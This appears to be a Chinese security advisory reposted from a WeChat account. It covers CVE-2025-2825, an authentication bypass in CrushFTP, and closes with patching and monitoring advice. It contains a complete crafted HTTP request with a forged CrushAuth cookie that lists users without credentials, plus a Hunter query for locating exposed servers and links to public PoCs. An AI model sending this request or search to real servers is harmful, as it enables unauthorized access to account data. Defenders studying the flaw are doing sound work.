免责声明
由于传播、利用WK安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负
责,WK安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除
并致歉。谢谢!
🚨 CrushFTP 爆出高危漏洞 CVE-2025-2825:无需密码即可绕过身份验证!
- 漏洞编号:CVE-2025-2825
- 影响组件:CrushFTP 服务器(多个版本受影响)
- 漏洞等级:高危 / Critical
- 漏洞类型:认证绕过(Authentication Bypass)
- 是否需要认证:❌ 不需要
- 利用难度:低(已公开 PoC,利用流程简单)
攻击者构造一个伪造的 CrushAuth
token 和 c2f
值,通过两次精心构造的请求,即可绕过正常认证机制,访问诸如 getUserList
等敏感接口。这种攻击策略类似于一些 Web 安全测试框架(如 nuclei)采用的双请求策略,用于绕过某些状态校验。
资产语法(Hunter): web.title="CrushFTP WebInterface"
GET /WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f=zE1G HTTP/1.1
Host: 192.168.1.13:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Length: 0
Connection: keep-alive
Cookie: currentAuth=zE1G; CrushAuth=1743755252300_3oa5v32dYiIPaoHiBqK6MnezuvzE1G
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/
Priority: u=0
✅ 可直接获取系统账户信息
✅ 可作为进一步攻击的跳板(如 RCE、权限提升)
✅ 可绕过安全审计,轻松入侵目标系统
🚫 无需任何登录凭证,完全绕过认证逻辑!
- 官方已在 2025 年 3 月底发布补丁,请务必更新至最新版本(v10.6.x 以上)
- 若无法立即更新,请临时:
- 禁用外部访问接口
- 设置防火墙规则仅允许可信 IP 访问
- 监控异常请求日志中的
CrushAuth
或getUserList
请求
- 检查是否开放了 WebInterface 对外端口
- 过滤并监控可疑请求参数:如
c2f
、CrushAuth
- 使用 WAF 规则封禁异常调用接口路径
- 定期更新 FTP 管理端安全策略与访问白名单
参考链接
https://github.com/punitdarji/crushftp-CVE-2025-2825
https://github.com/WOOOOONG/CVE-2025-2825
原文始发于微信公众号(WK安全):CVE-2025-2825 | CrushFTP 身份验证绕过【资产居多】
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论